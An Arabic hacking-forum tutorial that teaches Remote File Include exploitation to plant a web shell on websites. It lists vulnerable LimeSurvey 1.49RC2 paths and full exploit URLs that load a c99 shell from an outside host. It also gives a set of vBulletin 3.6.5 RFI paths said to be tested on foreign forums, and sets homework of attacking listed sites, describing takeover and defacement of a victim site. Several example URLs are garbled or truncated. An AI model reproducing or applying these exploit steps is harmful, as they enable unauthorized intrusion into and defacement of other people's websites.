هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.



 
الرئيسيةالرئيسية  البوابةالبوابة  أحدث الصورأحدث الصور  التسجيلالتسجيل  دخولدخول  

 

 كيفية رفع الشيل عبر ثغرات File Include

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin



المساهمات : 41
تاريخ التسجيل : 23/07/2008

كيفية رفع الشيل عبر ثغرات File Include Empty
مُساهمةموضوع: كيفية رفع الشيل عبر ثغرات File Include   كيفية رفع الشيل عبر ثغرات File Include Icon_minitimeالأربعاء 23 يوليو - 5:24

بسم الله الرحمن الرحيم

كيف الحال يا شباب عساكم بخير ان شاء الله

يا طويلين العمر عرفنا وش هو السيرفر وعرفنا وش هو الموقع

الحين واحد فيكم يسأل سؤال وجيه

حنا نبي موقع على السيرفر ليش تقول شيل عالسيرفر ؟؟

الجواب : لأن يمكن نقدر نرفع الشيل في مجلد الموقع المستهدف

اللي هو

كود PHP:
/home/ksa/public_html

ويمكن ما نقدر عليه

لذلك نرفعه بأي منطقة ثانية على السيرفر اهم شي انه بنفس جهاز الكمبيوتر

كيييييييييييييييييف ؟؟؟

في عدة طرق انا راح اشرح اليوم طريقة

ام الطرق الثانية راح تكون في درس منفصل بإذن الله

الطريقة اللي راح اشرحها الحين وهي عن طريق [ الثغرات ]

يعني نرفع شيل من خلال ثغره

طبعاً الثغرات أنواع كثيره ولازم الواحد يتعمق فيها لكن دورتنا ما راح اشرح الثغرات كلها

راح اشرح اسهل نوع من انواع الثغرات ويأدي الغرض اللي نبيه ..

وهو ثغرات الـ File Include ( الفايل انكلود ) أو بالعربي ادراج ملف

يمكننا البحث عن الثغرات في مواقع الحماية وانا انصح بهذي المواقع

www.milw0rm.com
www.securityreason.com

لأن البحث عن الثغرات فيها بسيط وهي من اقوى المواقع في نفس الوقت

طبعاً انا راح اشرح كيف يتم استغلال ثغرات الفايل انكلود

نختار ثغرة من الميل ورم مثلاً

هذي الثغره

http://www.milw0rm.com/exploits/4156

تعالوا نطلع عليها

نشوف هالأشياء

فيها اسم المكتشف ووو .. لكن شوفوا هالخانات



كود PHP:
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2




Script site = موقع مبرمج السكريبت
Script name = اسم السكربت المصاب
Version = الاصدار المصاب

طيب واحد يقول لنا يا بو عابد وش هو السكريبت ؟

السكريبت هو برنامج مبرمج بلغة الـ php مثل سكربت المنتدى وسكربت البطاقات .. الخ

الحين الثغره اللي عرضتها فوق يقول لنا في سكريبت اسمه LimeSurvey فيه ثغرة فايل انكلود

يعني نقدر ندرج من خلالها شيل .. او بالأصح اي موقع مركب هالسكريبت نقدر نرفع فيه شيل

تعالوا نكمل نشوف الثغره

نشوف هالخانه




كود PHP:
## Type : RFI(Remote File Include)





Type = النوع

مثل ماهوب ظاهر لنا ريموت فايل انكلود ( يعني ادراج ملف عن بعد )

واختصارها RFI وهي أول حرف من كلمة كلمة

المهم عرفنا انها فايل انكلود اتركوا كل الكلام لأنه ما يفيدنا

اهم شي في الثغره نعرفه

هو

1- اسم السكريبت المصاب . ( عرفنا في ثغرتنا انه اسم السكريبت المصاب هو LimeSurvey )
2- الاصدار المصاب . ( عرفنا في ثغرتنا فوق ان الاصدار المصاب هو 1.49RC2 )
3- نوع الثغره . ( عرفنا فوق ان الثغرات اللي حنا نشرح عليها فايل انكلود أي ثغرات ثانية استغلالها مختلف )
4- الاستغلال .

الحين عرفنا كل الأنواع أين الاستغلال

تعالوا نرجع لصفحة الثغره هنا

http://www.milw0rm.com/exploits/4156

ابحثوا عن عبارة Exploit وتعني ( الاستغلال )

انا لقيتها





كود PHP:
## Exploit :




نلاحظ ان فيه اكثر من استغلال

وهذي هي الاستغلالات




كود PHP:
## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
## /admin/classes/pear/OLE/PPS.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]




ناخذ استغلال من الاستغلالات
/admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
تعالوا نحلل الاستغلال هذا
admin = مجلد
classes = مجلد آخر
pear = مجلد ثاني آخر
OLE = مجلد ثالث آخر
PPS = مجلد رابع آخر .. يا ليل البعارين
File.php = الملف المصاب

تعالوا نترجم الاستغلال

يقول لك الاستغلال ادخل مجلد admin داخله بتلقى مجلد classes ادخله وبتلقى داخله مجلد ثاني pear ادخله وداخله بتلقى مجلد ثالث OLE

ادخله وداخله بتلقى مجلد PPS داخل هالمجلد بتلقى ملف File.php وهو الملف المصاب

طيب ترجمنا الاستغلال ترى ما نحتاج الترجمه بس عشان تفهمون لا أكثر ولا أقل

لو جينا وقلنا هذا موقع

http://www.osoud.net/vb/,]

سكريبت LimeSurvey اصداره 1.49RC2 راكب عليه هنا

[http://www.osoud.net/vb/]

وحنا عندنا ثغرة نرفع الشيل تعالوا نستغلها

بما ان السكريبت داخل مجلد ls في الموقع

راح يكون تطبيقنا كذا





كود PHP:
http://www.vbhacker.net/ls/admin/cla...e.php?homedir=[shell] http://www.vbhacker.net/ls/admin/cla...e.php?homedir=[shell] http://www.vbhacker.net/ls/admin/cla...e.php?homedir=[shell] www. vhacker.net
/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[shell] http://www.osoud.net/vbls/admin/clas...e.php?homedir=[shell] [urlhttp://www.osoud.net/vb/admin/classes/pear/OLE/PPS/File.php?homedir=[/url][shell] http://www.osoud.net/vb/admin/classe...e.php?homedir=[shell]





هذا هو الاستغلال
الحين كل اللي علينا نستبدل عبارة
[shell]
برابط شيل مرفوع على اي موقع بامتداد txt
لو انا مثلاً رافع شيل على موقع
بامتداد txt
كمثال شوف
http://younes.by.ru/c99.txt
هذا شيل c99 مرفوع على موقع
لاحظوا ان امتداده هو
txt
وليس
php
وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب
وليس قراءة الملف في الموقع اللي رافعين عليه الشيل
الاستغلال بيكون كذا




كود PHP:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt?




لاتنسوا عند الادراج تضعون علامة الاستفاهم في نهاية الاستغلال
تعالوا نترجم الأمر اللي سويناه
لو الحين فتحنا الصفحة هذي





كود PHP:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt?





بيعرض لنا الشيل اللي حنا رافعينه على موقع ثاني ولكن بينعرض على موقع منظمة الاختراق العالمية
تعالوا نحلل الاستغلال ثاني
حنا الحين من خلال ثغرة في سكريبت مرفوع على موقع منظمة الاختراق العالمية

أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة
http://younes.by.ru/c99.txt
داخل منظمة الاختراق العالمية
وقراءتها على سيرفر منظمةhttp://www.osoud.net/vb/

يعني انه بيسحب أكواد الشيل ويشغله على منظمة الاختراق العالمية

وبكذا بيعرض لنا الشيل http://www.osoud.net/vb/ة وحنا في الحقيقه ما رفعناه على الموقع كل اللي سويناه عرض على الموقع

ونقدر نتحكم بالموقع كامل من خلال هالطريقه .. وكذلك لو كان في مجلد مصرح 777 تقدر ترفع فيه الشيل على المواقع او صفحتك او اي شي

الحين نجي لدرسنا السابق وهو الصلاحيات الحين لو عرضنا الشيل على http://www.osoud.net/vb/

وطلعت لنا الصلاحية = osoud.net/vbهذا يعني ان صلاحيتنا يوزر عالموقع يعني نقدر نتحكم في مجلد منظمة الاختراق العالمية

يعني ما يحتاج تصريح 777 تقدر ترفع اندكسك بالصفحة الرئيسية وتلعب بالموقع كامل لعب لأن صلاحيتك حالياً هي يوزر يعني مالك الموقع

وبكذا نكون انتهينا من شرح استغلال ثغرات الفايل انكلود والحمد لله

قبل ما اطلع من الدرس حاب اعطيكم هدية بسيطه
===============================================
جاني واحد من الشباب وعطاني هالثغره
ثغرتين فايل انكلود تساعدك لرفع شل على نسخة ال 3.6.5 vb
الثغره مجربه علي اكثر من منتدي اجنبي






كود PHP:
vb/includes/functions_cron.php?nextitem=shell

vb/includes/functions.php?classfile=shell

vb/includes/functions_forumdisplay.php?specialtemplates= shell







مثال على الاستغلال :-
[http://www.osoud.net/vbincludes/fu...cialtemplates=[/url] shell
لا تنسى استبدال shell برابط شيل txt ولاتنسى علامة الاستفاهم واحلى اختراق
==================================================
تعالوا ما انتهينا يا حلوين .. هع مافي راحة



حنا شرحنا فوق الثغره وانا شرحت استغلال واحد من الاستغلالات

الحين راع اعطي أمثلة مواقع ( وهمية )

هذي مواقع نفترض انها مركبة السكريبت والسكريبت فيها موجود بمجلد ss

هذي هي

www.soper.com/ss
www.ksa.com/ss
www.sos.com/ss
www.7looo.com/ss

ابيكم ترجعون تشوفون الاستغلالات فوق وتستغلونها على هذي المواقع

وكل استغلال مختلف عن الثاني يعني لا يجي واحد يطبق لي نفس الاستغلال غلى المواقع كلها

ويكون الاستغلال كامل مع الشيل وكل شي ..

مثال على استغلال كامل








كود PHP:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt?



B @ r 0 n E
BaRoNe.HaCkEr@W.cN
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://dilal-alhackers.rigala.net
 
كيفية رفع الشيل عبر ثغرات File Include
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
 :: الاختراق :: اختراق المواقع و المنتديات-
انتقل الى: